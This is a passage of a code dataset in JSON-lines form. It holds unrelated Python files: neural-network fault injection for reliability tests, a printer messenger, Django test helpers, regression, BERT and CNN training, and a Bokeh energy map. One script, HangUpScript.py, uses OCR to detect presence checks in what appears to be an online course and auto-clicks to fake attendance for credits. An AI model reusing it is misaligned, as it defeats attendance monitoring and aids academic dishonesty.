optimizedModel = optimize(processed.train, initialModel, l, niter, 0)\n if predict_mode == \"knn\":\n prediction = predictNN(optimizedModel, labels, processed.test,\n \"classification\", n_neighbors,\n representation, prior)\n elif predict_mode == \"bayes\":\n prediction = predictBayes(\n optimizedModel, labels, processed.test, prior)\n return prediction\n\n\ndef GTR(train, labels, test, k=0, m=0, s=0.3, l=0.1, n_neighbors=1, niter=200,\n representation=\"modes\", doPCA=False, n_components=-1,\n missing=False, missing_strategy='most_frequent', random_state=1234):\n if k == 0:\n k = int(math.sqrt(5*math.sqrt(train.shape[0])))+2\n if m == 0:\n m = int(math.sqrt(k))\n processed = ugtm_preprocess.processTrainTest(train, test,\n doPCA, n_components)\n initialModel = initialize(processed.train, k, m,\n s, random_state=random_state)\n optimizedModel = optimize(processed.train, initialModel, l, niter, 0)\n prediction = predictNN(optimizedModel=optimizedModel, labels=labels,\n new_data=processed.test, modeltype=\"regression\",\n n_neighbors=n_neighbors,\n representation=representation)\n return prediction\n","sub_path":"ugtm/ugtm_predictions.py","file_name":"ugtm_predictions.py","file_ext":"py","file_size_in_byte":8046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"360785004","text":"#---------------------------------------------------\n# Imports\n#---------------------------------------------------\nfrom __future__ import print_function\nimport argparse\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision import datasets, transforms, models\nfrom torch.utils.data.dataloader import DataLoader\nfrom torch.autograd import Variable\nfrom torchviz import make_dot\nfrom matplotlib import pyplot as plt\nfrom matplotlib.gridspec import GridSpec\nimport numpy as np\nimport datetime\nimport pdb\nfrom self_models import *\nimport sys\nimport os\nimport shutil\nimport argparse\n\nerror_type = 'stuck-at-one'\n#error_type = 'stuck-at-zero'\n# error rates: \n\nlist_of_frate = [0.0013, 0.0064, 0.0128, 0.1276, 0.1913, 0.2551, 0.3189, 0.3827]\n\nfrate = list_of_frate[7]\n\ndef insert_faults(state, key, frate):\n # print(state['state_dict']['module.features.0.weight'].data[0, 0, 0])\n print(list(state['state_dict'][key].size()))\n weight_size = list(state['state_dict'][key].size())\n n_indexes = len(weight_size)\n n_elem = torch.numel(state['state_dict'][key])\n n_faults = int(n_elem*frate)\n i = 0\n while (i < n_faults):\n rand_indexes = np.random.randint(0, high=n_elem, size=n_indexes)\n # print(rand_indexes)\n findexes = tuple(np.remainder(rand_indexes, weight_size))\n # if findexes not in (list_findexes):\n i += 1\n # print((findexes))\n # print(state['state_dict'][key].data)\n # input(\"--------\")\n # print(state['state_dict'][key].data[findexes])\n try:\n if error_type == 'stuck-at-zero':\n state['state_dict'][key].data[findexes] = 0.0\n elif error_type == 'stuck-at-one':\n if (state['state_dict'][key].data[findexes] < 0.5 and state['state_dict'][key].data[findexes] >= 0.0): \n state['state_dict'][key].data[findexes] += 0.5\n elif (state['state_dict'][key].data[findexes] < -0.5 and state['state_dict'][key].data[findexes] >= -1.0): \n state['state_dict'][key].data[findexes] += 0.5\n except:\n print(rand_indexes)\n print(findexes)\n # print(state['state_dict'][key].data[findexes])\n # input(\"--------\")\n print(i)\n print(n_elem)\n return 0\n\nmodel = VGG_SNN_STDB(vgg_name = 'VGG16', activation = 'Linear', labels=10, timesteps=200, leak=1.0, default_threshold=1.0, alpha=0.3, beta=0.01, dropout=0.3, kernel_size=3, dataset='CIFAR10')\nmodel = nn.DataParallel(model) \npretrained_snn = './trained_models/snn/snn_vgg16_cifar10.pth'\nstate = torch.load(pretrained_snn, map_location='cpu')\n\n# insert_faults(state, 'module.classifier.3.weight', frate)\n\n# exit()\n \ncur_dict = model.state_dict() \nfor key in state['state_dict'].keys():\n \n if key in cur_dict:\n if (state['state_dict'][key].shape == cur_dict[key].shape):\n insert_faults(state, key, frate)\n\n # cur_dict[key] = nn.Parameter(state['state_dict'][key].data)\n print('\\n Loaded {} from {}'.format(key, pretrained_snn))\n else:\n print('\\n Size mismatch {}, size of loaded model {}, size of current model {}'.format(key, state['state_dict'][key].shape, model.state_dict()[key].shape))\n else:\n print('\\n Loaded weight {} not present in current model'.format(key))\n# model.load_state_dict(cur_dict)\n\n# if 'thresholds' in state.keys():\n# try:\n# if state['leak_mem']:\n# state['leak'] = state['leak_mem']\n# except:\n# pass\n# if state['timesteps']!=200 or state['leak']!=1.0:\n# print('\\n Timesteps/Leak mismatch between loaded SNN and current simulation timesteps/leak, current timesteps/leak {}/{}, loaded timesteps/leak {}/{}'.format(timesteps, leak, state['timesteps'], state['leak']))\n# thresholds = state['thresholds']\n# model.module.threshold_update(scaling_factor = 0.7, thresholds=thresholds[:])\n# else:\n# print('\\n Loaded SNN model does not have thresholds')\n\n# print('\\n {}'.format(model))\n\ntry:\n os.mkdir('./trained_models/snn/')\nexcept OSError:\n pass \nfilename = './trained_models/snn/snn_vgg16_cifar10_'+error_type+'_'+str(frate)+'.pth'\ntorch.save(state,filename) \n \n","sub_path":"modify_snn_weight.py","file_name":"modify_snn_weight.py","file_ext":"py","file_size_in_byte":4276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"329844414","text":"# PRINTIGRAM \n# 1 July 2019\n# Tested for Python 3.7.2 on Windows 10 Pro\n# The programme only works on Windows; need to change font to work on other OS.\n\n# Imports. Pil for images, os for paths and file management, printipigeon to sent pictures to printi.\nfrom PIL import Image, ImageDraw, ImageFont\nimport os\nimport printipigeon as pp\n\n# Change directory to where you have stored chromedriver.exe\nos.chdir(\"C:/Users/Merlijn Kersten/Documents/Github/Printigram\")\n\n# The Printigram function\ndef printigram(inputtext): \n lines = [] # Create empty list to store individual lines\n while inputtext != '': # Continue creating lines until the string is empty (i.e. the whole string has been added to lines)\n if len(inputtext) <= maxlength: # If string is not longer than the maximum line length, add it to the lines list.\n lines.append(inputtext)\n break\n else: # If it is, add the longest possible string of words to the lines list (i.e. until the last space before the break)\n linebreak = inputtext.rfind(' ', 0, maxlength)\n lines.append(inputtext[:linebreak])\n inputtext = inputtext[linebreak+1:] # Delete the string of words you added to the lines list from the original string.\n img = Image.new('RGB', (width,len(lines)*50-10), color = 'white') # Create an white image with the width of the printer and the length of the lines\n fnt = ImageFont.truetype('C:/Windows/Fonts/Consola.ttf', size=40) # Use the Consolas font. Only works on Windows.\n for i in range(len(lines)):\n ImageDraw.Draw(img).text((0,i*50), lines[i], font=fnt, fill=(0,0,0)) # Write lines in black text.\n img.save('text.png')\n pp.send_from_path('text.png', printiname) # Use Printi Pigeon to sent pictures to correct printer # Quit driver\n os.remove('text.png') # Remove image\n\n# Script to determine whether one of the words is too long to print. \ndef findlengths(inputtext):\n words = inputtext.split(' ')\n maxinputlength = 0\n for i in range(len(words)):\n if len(words[i]) > maxinputlength:\n maxinputlength = len(words[i])\n return maxinputlength\n\n# User-interactions.\nprint('\\n PRINTIGRAM')\nprint(' Type \"QUIT\" to exit \\n')\n\n# Ask whether to send messages to printi.me or printi.me/mango (different address and different widths)\nprinti = input(' Which printi? Type F (Fons) or M (/mango): ')\nwhile printi not in ['F', 'M', 'f', 'm']: # Make sure that a Printi is chosen\n printi = input('\\n Whoops! Try again. Type F (Fons) or M (/mango): ')\nif printi == 'F' or printi == 'f':\n printiname = 'printi'\n width = 576 # Width in pixels\n maxlength = 25 # Maximum number of characters that fit on one line\nelse:\n printiname = 'mango'\n width = 384 # Width in pixels\n maxlength = 16 # Maximum number of characters that fit on one line\n# If new Printi comes online: simply add its details and key above.\n\n# Ask for message input\nmessage = input('\\n Message: ')\nwhile findlengths(message) > maxlength: # Checks whether input words are short enough to print\n print('One of your words is too long. They cannot be longer than ' + str(maxlength) + ' characters.\\n')\n message = input(' Message: ')\nwhile message != 'QUIT': # Regular text: send it to chosen printi\n printigram(message)\n message = input('\\n Message: ')\nif message == 'QUIT': # 'QUIT': Quit programme\n print()\n exit()","sub_path":"Printigram.py","file_name":"Printigram.py","file_ext":"py","file_size_in_byte":4042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"483142618","text":"# coding: utf-8\nimport os\nfrom contextlib import contextmanager\nfrom subprocess import check_output\nfrom django.test.signals import setting_changed\nfrom django.conf import UserSettingsHolder\n\n\n@contextmanager\ndef same_open_fd_count(testcase):\n num_opened_fd_before = get_open_fds_count()\n yield\n num_opened_fd_after = get_open_fds_count()\n testcase.assertEqual(\n num_opened_fd_before, num_opened_fd_after,\n 'Open descriptors count changed, was %s, now %s' % (num_opened_fd_before, num_opened_fd_after)\n )\n\n\ndef get_open_fds_count():\n \"\"\"Return the number of open file descriptors for current process\n\n .. warning: will only work on UNIX-like os-es.\n \"\"\"\n pid = os.getpid()\n procs = check_output([\"lsof\", '-w', '-Ff', \"-p\", str(pid)])\n nprocs = len([s for s in procs.decode('utf-8').split('\\n') if s and s[0] == 'f' and s[1:].isdigit()])\n return nprocs\n\n\nclass override_custom_settings(object):\n \"\"\"\n settings overrider context manager.\n https://github.com/django/django/blob/1.6.2/django/test/utils.py#L209-L268\n \"\"\"\n def __init__(self, settings_obj, **kwargs):\n self.settings = settings_obj\n self.options = kwargs\n\n def __enter__(self):\n self.enable()\n\n def __exit__(self, exc_type, exc_value, traceback):\n self.disable()\n\n def enable(self):\n override = UserSettingsHolder(self.settings._wrapped)\n for key, new_value in self.options.items():\n setattr(override, key, new_value)\n self.wrapped = self.settings._wrapped\n self.settings._wrapped = override\n for key, new_value in self.options.items():\n setting_changed.send(sender=self.settings._wrapped.__class__,\n setting=key, value=new_value)\n\n def disable(self):\n self.settings._wrapped = self.wrapped\n del self.wrapped\n for key in self.options:\n new_value = getattr(self.settings, key, None)\n setting_changed.send(sender=self.settings._wrapped.__class__,\n setting=key, value=new_value)\n","sub_path":"tests/thumbnail_tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"638468739","text":"\"\"\"Add link to Google Colab for each notebook\n\nRipped from https://github.com/jakevdp/PythonDataScienceHandbook/blob/master/tools/add_navigation.py\n\"\"\"\n\nimport os\nimport glob\nimport nbformat\nfrom nbformat.v4.nbbase import new_markdown_cell\n\nROOT_DIR = os.path.dirname(os.path.abspath(__file__))\n\ndef iter_notebooks():\n \"\"\"Returns notebook files in all subdirectories\"\"\"\n\n return (filename for filename in glob.iglob(ROOT_DIR + '**/**/*.ipynb', recursive=True))\n\nLINK_COMMENT = \"\\n\"\n\nCOLAB_LINK = \"\"\"\n\"Open\n\"\"\"\n\ndef iter_links():\n \"\"\"Returns paths to notebooks and HTML link to Google Colab for each of them\"\"\"\n\n for nb_path in iter_notebooks():\n link = LINK_COMMENT\n link += COLAB_LINK.format(notebook_filename=os.path.relpath(nb_path))\n yield os.path.join(ROOT_DIR, nb_path), link\n\ndef write_links():\n \"\"\"Add or update a cell in each notebook with a Google Colab link\"\"\"\n\n for nb_name, link in iter_links():\n notebook = nbformat.read(nb_name, as_version=4)\n nb_file = os.path.basename(nb_name)\n is_comment = lambda cell: cell.source.startswith(LINK_COMMENT)\n\n if is_comment(notebook.cells[0]):\n print(\"Amending link for {0}\".format(nb_file))\n notebook.cells[0].source = link\n else:\n print(\"Inserting link for {0}\".format(nb_file))\n notebook.cells.insert(0, new_markdown_cell(source=link))\n\n nbformat.write(notebook, nb_name)\n\nif __name__ == '__main__':\n write_links()\n","sub_path":"postgen_script.py","file_name":"postgen_script.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"315728315","text":"import random\nimport pandas as pd\nimport numpy as np\nfrom numpy.linalg import inv\nfrom numpy import dot\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\n# 最小二乘法求系数\ndef least_square(X, Y):\n X = np.mat(X)\n Y = np.mat(Y)\n beta = dot(dot(inv(dot(X.T, X)), X.T), Y)\n return beta\n\n\n# 回归残差检验\ndef regression_residual_diagnosis(y_original, y_regression):\n y_original = np.mat(y_original)\n y_regression = np.mat(y_regression)\n SSE = np.sum(np.square(y_regression - y_original), axis=0)\n return SSE\n\n\n# 导入excel表格数据\ndata = pd.read_excel('.//data//西瓜数据集.xlsx')\ndata = pd.DataFrame(data).to_numpy()\n\n# 构造数据集X矩阵和Y矩阵。并在X中添加常数项\nx = np.mat(data[:, 1:3])\nconstant = np.ones((x.shape[0], 1))\nX = np.c_[constant, x]\nY = np.mat(data[:, 3]).T\n\n# 从数据集中随机取出10个样本求解系数\n# 记录SSE小于0.3的参数集\ncounts = 10\nbetas = np.zeros((100, 3))\ncount = 0\nwhile 1:\n train_x = np.zeros((counts, 3))\n train_y = np.zeros((counts, 1))\n for i in range(counts):\n index = random.randint(0, X.shape[0] - 1)\n train_x[i] = X[index, 0:3]\n train_y[i] = Y[index, 0]\n # 用最小二乘法算出系数集β\n beta = least_square(train_x, train_y)\n # 计算出回归得到的拟合值\n y_regression = dot(X, beta)\n # 残差检验\n SSE = regression_residual_diagnosis(Y, y_regression)\n if SSE > 0.30:\n continue\n else:\n betas[count] = beta.T\n count += 1\n if count == 100:\n break\n# 对残差检验结果良好的参数集取平均,并进行标准化后用于分析\nbeta_avg = np.mean(betas, axis=0)\nSSE = regression_residual_diagnosis(Y, dot(X, beta_avg).T)\nstandard_beta = np.mean((betas.T - np.mean(betas.T, axis=0)) / np.std(betas.T, axis=0), axis=1)\n# 结果打印\nprint('多元线性回归模型:y=' + str(beta_avg[0]) + '+' + str(beta_avg[1]) + 'x1+' + str(beta_avg[2]) + 'x2')\nprint('参数集β:' + 'β0=' + str(beta_avg[0]) + ' β1=' + str(beta_avg[1]) + ' β2=' + str(beta_avg[2]))\nprint('残差平方和SSE=' + str(SSE))\nprint('标准化参数集β为:' + str(standard_beta))\n\n# 用三维散点图展示原始数据\nx1 = data[:, 1].T\nx2 = data[:, 2].T\ny_original = data[:, 3].T\nfig = plt.figure()\nax = Axes3D(fig)\nax.scatter(x1, x2, y_original, c='g', label='original')\nax.legend(loc='best')\n# 用二元函数图表示二元线性回归模型\nX_r, Y_r = np.meshgrid(np.arange(0, 1, 0.1), np.arange(0, 1, 0.1))\nZ_r = beta_avg[0] + beta_avg[1] * X_r + beta_avg[2] * Y_r\nax.plot_wireframe(X_r, Y_r, Z_r, rstride=1, cstride=1)\nax.view_init(elev=28, azim=0) # 改变绘制图像的视角,即相机的位置,azim沿着z轴旋转,elev沿着y轴\nax.set_xlabel('x1')\nax.set_ylabel('x2')\nax.set_zlabel('y')\nplt.show()\n","sub_path":"Linear_Regression_Model.py","file_name":"Linear_Regression_Model.py","file_ext":"py","file_size_in_byte":2840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"353223088","text":"#!/usr/bin/env python3\n\nimport tensorflow as tf\nimport pandas as pd\nimport numpy as np\nfrom tensorflow import keras\nimport cleaning\nimport models\nimport train\nimport data\nfrom typing import Any\nfrom typing import List\n\n\nSAMPLE_SUBMISSION=\"../data/sample_submission.csv\"\n\n\ndef predictions_to_dataframe(predictions: np.ndarray) -> pd.DataFrame:\n \"\"\" Convert predictions to pd.DataFrame format \"\"\"\n y = np.round(predictions).astype(int).reshape(-1)\n sample_sub = pd.read_csv(SAMPLE_SUBMISSION)\n sample_ids = sample_sub['id'].values.tolist()\n return pd.DataFrame({\"id\": sample_ids, \"target\": y})\n\n\ndef get_testset() -> pd.DataFrame:\n \"\"\" Return preprocessed testset \"\"\"\n\n test, _ = data.create_sequences(test, data.TWEET_MAX_LEN)\n return test\n\n\ndef submit(model_path: str, dst: str):\n \"\"\" Evaluate model and submit results \"\"\"\n model = keras.models.load_model(model_path)\n testset = get_testset()\n predictions = model.predict(testset)\n df = predictions_to_dataframe(predictions)\n df.to_csv(dst, index=False)\n print(\"Success; model: \" + model_path + \"; dst: \" + dst)\n print(df.head())\n\n\ndef get_bert_testset(sess: tf.Session) -> Any:\n \"\"\" Get preprocessed testset \"\"\"\n _, test = data.load(test=\"test.csv\")\n tokenizer = data.create_bert_tokenizer(sess)\n bert_input = data.get_bert_input(tokenizer, test)\n return bert_input\n\n\ndef submit_bert(model_path: str, dst: str) -> None:\n \"\"\" Evaluate model and submit results \"\"\"\n sess = tf.Session()\n keras.backend.set_session(sess)\n testset = get_bert_testset(sess)\n model = models.make_bert_v2_model(n_fine_tune_layers=2)\n train.initialize_vars(sess)\n model.load_weights(model_path)\n predictions = model.predict(testset)\n df = predictions_to_dataframe(predictions)\n df.to_csv(dst, index=False)\n print(\"Success; model: \" + model_path + \"; dst: \" + dst)\n print(df.head())\n\n \ndef submit_bert_combined(model_paths: List[str], dst: str) -> None:\n \"\"\" Evaluate model and submit results \"\"\"\n sess = tf.Session()\n keras.backend.set_session(sess)\n testset = get_bert_testset(sess)\n model = models.make_bert_v2_model(n_fine_tune_layers=2, pooling=\"mean\")\n train.initialize_vars(sess)\n\n predictions_list = []\n for w_path in model_paths:\n model.load_weights(w_path)\n predictions_list.append(model.predict(testset))\n\n predictions_list = np.array(predictions_list)\n print(predictions_list.shape)\n predictions = np.average(np.array(predictions_list), axis=0)\n print(predictions.shape)\n \n df = predictions_to_dataframe(predictions)\n df.to_csv(dst, index=False)\n print(\"Success; model: \" + str(model_paths) + \"; dst: \" + dst)\n print(df.head())\n\n \nif __name__ == \"__main__\":\n if False:\n submit(\n \"../logs/lstm_64_without_cleaning.h5\",\n \"../logs/lstm_64_without_cleaning.csv\"\n )\n if False:\n submit(\n \"../logs/lstm_64_with_cleaning.h5\",\n \"../logs/lstm_64_with_cleaning.csv\"\n )\n if False:\n submit(\n \"../logs/lstm_64_with_cleaning_dropout_0.1.h5\",\n \"../logs/lstm_64_with_cleaning_dropout_0.1.csv\"\n )\n if False:\n submit(\n \"../logs/lstm_128_with_better_embeddings_coverage.h5\",\n \"../logs/lstm_128_with_better_embeddings_coverage.csv\"\n )\n if False:\n submit_bert(\n \"../logs/bert_256_with_cleaned_data.h5\",\n \"../logs/bert_256_with_cleaned_data.csv\"\n )\n if False:\n submit_bert(\n \"../logs/bert_256_2_06_0.87.h5\",\n \"../logs/bert_256_2_06_0.87.csv\"\n )\n if False:\n submit_bert(\n \"../logs/bert_v2_64_0.85.h5\",\n \"../logs/bert_v2_64_0.85.csv\"\n )\n if False:\n submit_bert(\n \"../logs/bert_v2_2layers_050_0.8639.h5\",\n \"../logs/bert_v2_2layers_050_0.8639.csv\"\n )\n if False:\n submit_bert(\n \"../logs/bert_v2_2layers_011_0.8407.h5\",\n \"../logs/bert_v2_2layers_011_0.8407.csv\"\n )\n if False:\n submit_bert_combined(\n [\"../checkpoints/bert_v2_2layers_050_0.8639.h5\",\n \"../checkpoints/bert_v2_2layers_060_0.8546.h5\"],\n \"../logs/bert_v2_2layers_combined.csv\"\n )\n if False:\n submit_bert_combined(\n [\"../checkpoints/bert_v2_2layers_dirty_005_0.8523.h5\",\n \"../checkpoints/bert_v2_2layers_dirty_003_0.8414.h5\",\n \"../checkpoints/bert_v2_2layers_dirty_006_0.8419.h5\",\n \"../checkpoints/bert_v2_2layers_dirty_007_0.8427.h5\",\n \"../checkpoints/bert_v2_2layers_dirty_012_0.8443.h5\",\n \"../checkpoints/bert_v2_2layers_dirty_013_0.8402.h5\",\n \"../checkpoints/bert_v2_2layers_dirty_015_0.8446.h5\",\n \"../checkpoints/bert_v2_2layers_dirty_017_0.8448.h5\",\n \"../checkpoints/bert_v2_2layers_dirty_019_0.8485.h5\"],\n \"../logs/bert_v2_2layers_dirty_combined.csv\"\n )\n if True:\n submit_bert_combined(\n [\"../checkpoints/bert_v2_2layers_mean_007_0.8531.h5\",\n \"../checkpoints/bert_v2_2layers_mean_008_0.8508.h5\",\n \"../checkpoints/bert_v2_2layers_mean_012_0.8504.h5\",\n \"../checkpoints/bert_v2_2layers_mean_009_0.8434.h5\",\n \"../checkpoints/bert_v2_2layers_mean_010_0.8404.h5\",\n \"../checkpoints/bert_v2_2layers_mean_016_0.8466.h5\",\n \"../checkpoints/bert_v2_2layers_mean_017_0.8447.h5\",\n ],\n \"../logs/bert_v2_2layers_mean_combined.csv\"\n )\n","sub_path":"models/submit.py","file_name":"submit.py","file_ext":"py","file_size_in_byte":5622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"568075217","text":"# coding:utf-8\nimport os\nfrom PIL import ImageGrab,Image\nimport pytesseract\nimport threading\nimport pyautogui\nimport random\nimport time\n\npos=[600,465,1222,659]\ntarget0=r'学习'\ntarget1=r'在吗'\ntarget2=r'离开'\ntarget3=r'学分'\ntarget4=r'走开'\n\ndef t1():\n print('Start:')\n\n#定时\ndef t2():\n t1()\n while 1:\n fun()\n time.sleep(10)\n\ndef fun():\n \n print('执行--')\n file_path='C:\\PythonLearn\\Scripts\\AutoLearn\\Image.jpg'\n pic=ImageGrab.grab(pos)\n pic.save(file_path)\n text=pytesseract.image_to_string(Image.open(file_path),lang='chi_sim').encode('utf-8')\n result0=text.rfind(target0)>0\n result1=text.rfind(target1)>0\n result2=text.rfind(target2)>0\n result3=text.rfind(target3)>0\n result4=text.rfind(target4)>0\n print(text)\n end=result0|result1|result2|result3|result4\n if end:\n xrand=random.randint(890,910)\n yrand=random.randint(590,610)\n pyautogui.click(x=xrand,y=yrand,button='left')\n\nif __name__=='__main__':\n t=threading.Thread(target=t2)\n t.start()\n","sub_path":"HangUpScript.py","file_name":"HangUpScript.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"421170414","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Mar 21 17:32:11 2018\r\n\r\n@author: Vribs\r\n\"\"\"\r\n\r\nimport keras\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Dropout, Flatten,LSTM,Reshape\r\nfrom keras.layers import Conv2D, MaxPooling2D\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nimport csv\r\nimport os\r\nimport cv2\r\nimport numpy as np\r\n\r\nbatch_size = 64\r\nnum_classes = 2\r\nepochs = 3\r\n\r\nlabels = []\r\nlabels1 = []\r\n\r\nwith open(\"3.csv\", 'r') as f:\r\n reader = csv.reader(f)\r\n for row in reader:\r\n if row == []:\r\n labels.append(0)\r\n else:\r\n labels.append(1)\r\n \r\nwith open(\"4.csv\", 'r') as f:\r\n reader = csv.reader(f)\r\n for row in reader:\r\n if row == []:\r\n labels1.append(0)\r\n else:\r\n labels1.append(1)\r\n \r\n\r\nsize = 508\r\n\r\nlabels = labels + labels1\r\n\r\ny_train_np = np.array(labels[:size*2])\r\n\r\ny_test_np = np.array(labels1[:size])\r\n\r\ny_train_np = keras.utils.to_categorical(y_train_np, num_classes)\r\ny_test_np = keras.utils.to_categorical(y_test_np, num_classes)\r\n\r\nx_test_np = np.load('2.npy')\r\nx_train_np = np.load('1.npy')\r\nx_train_np = np.concatenate([x_train_np,x_test_np])\r\nx_train_np = x_train_np.astype('float32')\r\nx_train_np /= 255\r\n\r\n#x_train_np = np.expand_dims(x_train_np, axis = 4)\r\n \r\n \r\n\r\nx_test_np = x_test_np.astype('float32')\r\nx_test_np /= 255\r\n \r\n#x_test_np = np.expand_dims(x_test_np, axis = 4)\r\n\r\n\r\nprint(x_train_np.shape)\r\nprint(x_test_np.shape)\r\nprint(y_train_np.shape)\r\nprint(y_test_np.shape)\r\n\r\ninput_shape = (216, 144,3)\r\n\r\nmodel = Sequential()\r\nmodel.add(Conv2D(32, kernel_size=(3, 3),activation='relu',input_shape=input_shape))\r\nmodel.add(Conv2D(32, (3, 3), activation='relu'))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\nmodel.add(Dropout(0.25))\r\n#model.add(Flatten())\r\nmodel.add(Reshape((530,448)))\r\nmodel.add(LSTM(2))\r\nmodel.add(Dense(128, activation='relu'))\r\nmodel.add(Dropout(0.5))\r\n\r\nmodel.add(Dense(num_classes, activation='softmax'))\r\n\r\nmodel.summary()\r\n\r\nmodel.compile(loss=keras.losses.categorical_crossentropy,\r\n optimizer=keras.optimizers.Adadelta(),\r\n metrics=['accuracy'])\r\n\r\nmodel.fit(x_train_np, y_train_np,\r\n batch_size=batch_size,\r\n epochs=epochs,\r\n verbose=1,\r\n validation_data=(x_test_np, y_test_np))\r\nscore = model.evaluate(x_test_np, y_test_np, verbose=0)\r\n\r\nmodel.save('model_cnn.h5')\r\n\r\nprint(score)\r\nprint('Test loss:', score[0])\r\nprint('Test accuracy:', score[1])","sub_path":"cleanCode.py","file_name":"cleanCode.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"422265630","text":"import numpy as np\r\nimport pandas as pd\r\n\r\nfrom bokeh.plotting import figure, show, output_file\r\nfrom bokeh.models.widgets import Panel, Tabs\r\nfrom bokeh.io import output_file, show\r\nfrom bokeh.layouts import row\r\nfrom bokeh.palettes import Viridis3\r\nfrom bokeh.models import CheckboxGroup, CustomJS\r\n\r\ndata = pd.read_csv(\"GAS_ELK\\ELK_2016.csv\", decimal=',')\r\n\r\npost = pd.read_csv(\"4pp.csv\")\r\n\r\nhor = pd.read_csv('horecacoor.csv')\r\n\r\n\r\nxhor = [float(max(min(x*10000, 50130), 47500)) for x in hor['long']]\r\nyhor = [float(max(min(y*10000, 524200), 522930)) for y in hor['lat']]\r\nradiihor = [5+np.random.random()*2 for x in range(len(hor['long']))]\r\n\r\ncolorshor = []\r\nfor f in range(len(hor['long'])):\r\n if (hor['long'][f]-4) >= 0.9:\r\n longcol = (hor['long'][f]-4.9)*1700\r\n else:\r\n longcol = (hor['long'][f]-4.8)*700\r\n latcol = (hor['lat'][f]-52.3)*3200\r\n colorshor.append(\"#%02x%02x%02x\" % (int(max(min(latcol, 255), 190)), 0, int(longcol)))\r\n\r\navg = 0\r\ncounter = 0\r\nlastpost = 1011\r\n\r\nvalues = []\r\nxcoor = []\r\nycoor = []\r\n\r\ncoorlistx = []\r\ncoorlisty = []\r\npostcodelist = []\r\nll = []\r\navgpost = []\r\n\r\nfor j in data[\"POSTCODE_TOT\"]:\r\n if int(j[:4]) not in ll:\r\n ll.append(int(j[:4]))\r\n\r\nfor y in range(len(post[\"postcode\"])):\r\n if int(post[\"postcode\"][y]) in ll:\r\n coorlistx.append(post[\"longitude\"][y]*10000)\r\n coorlisty.append(post[\"latitude\"][y]*10000)\r\n postcodelist.append(post[\"postcode\"][y])\r\n\r\nlistcounter = 0\r\nfor i in range(len(data[\"POSTCODE_TOT\"])):\r\n if int(data[\"POSTCODE_TOT\"][i][:4]) in ll:\r\n avg += int(data[\"SJV\"][i]) * int(data[\"Aantal Aansluitingen\"][i]) * (float(data['%Fysieke status'][i])/100)\r\n counter += 1\r\n if lastpost != int(data[\"POSTCODE_TOT\"][i][:4]):\r\n if lastpost in ll:\r\n ll.remove(lastpost)\r\n if avg != 0:\r\n avgpost.append(int(avg/550000))\r\n avg, counter = 0,0\r\n lastpost = int(data[\"POSTCODE_TOT\"][i][:4])\r\n\r\nxcoor = coorlistx[:-1]\r\nycoor = coorlisty[:-1]\r\n\r\nx = xcoor\r\ny = ycoor\r\nradii = avgpost\r\n\r\ncolors = []\r\nfor f in avgpost:\r\n colors.append(\"#%02x%02x%02x\" % (int(max(min(f, 255), 65)), int(max(min(150-f, 255), 0)), int(max(min(f*4, 255), 65))))\r\n\r\nTOOLS=\"hover,crosshair,pan,wheel_zoom,zoom_in,zoom_out,box_zoom,undo,redo,reset,tap,save,box_select,poly_select,lasso_select,\"\r\n\r\np = figure(tools=TOOLS, plot_width=800, plot_height=580, title = 'ELEKTRICITEIT relatief aan horeca')\r\np.image_url(url=['Capture.png'],w=2668,h=1328, x=47494.287, y=524238.336)\r\n\r\np.scatter(xhor, yhor, radius=radiihor,\r\n fill_color=colorshor, fill_alpha=0.8,\r\n line_color=None)\r\n\r\np.scatter(x, y, radius=radii,\r\n fill_color=colors, fill_alpha=0.5,\r\n line_color=None)\r\n\r\np2 = figure(tools=TOOLS, plot_width=800, plot_height=580, title = 'ELEKTRICITEIT relatief aan horeca')\r\np2.image_url(url=['Capture.png'],w=2668,h=1328, x=47494.287, y=524238.336)\r\np2.scatter(x, y, radius=radii,\r\n fill_color=colors, fill_alpha=0.5,\r\n line_color=None)\r\n\r\ntab1 = Panel(child=p, title='Met horeca')\r\ntab2 = Panel(child=p2, title='Zonder horeca')\r\n\r\ntabs = Tabs(tabs=[tab1,tab2])\r\n\r\noutput_file(\"MAP_ELK_hor.html\", title=\"color_scatter.py example\")\r\n\r\nshow(tabs) # open a browser\r\n","sub_path":"project code and data/postcodeuphor.py","file_name":"postcodeuphor.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"216318026","text":"from tkinter import *\nfrom tkinter.filedialog import askopenfile\nfrom tkinter.messagebox import *\nimport base64\nimport tkinter.ttk\n\nfrom OpenSSL.crypto import load_pkcs12, sign, verify\n\n\nroot = Tk()\nroot.title('文件签名验证工具')\ntkinter.ttk.Label(root, text=\"签名文件: \").grid(row=0)\ntkinter.ttk.Label(root, text=\"证书证书: \").grid(row=1)\ntkinter.ttk.Label(root, text=\"证书密码: \").grid(row=2)\ne1 = tkinter.ttk.Entry(root)\ne2 = tkinter.ttk.Entry(root)\ne3 = tkinter.ttk.Entry(root)\n\ne1.grid(row=0, column=1)\ne2.grid(row=1, column=1)\ne3.grid(row=2, column=1)\nprint(type(e1))\n\n\ndef fb1():\n # df = 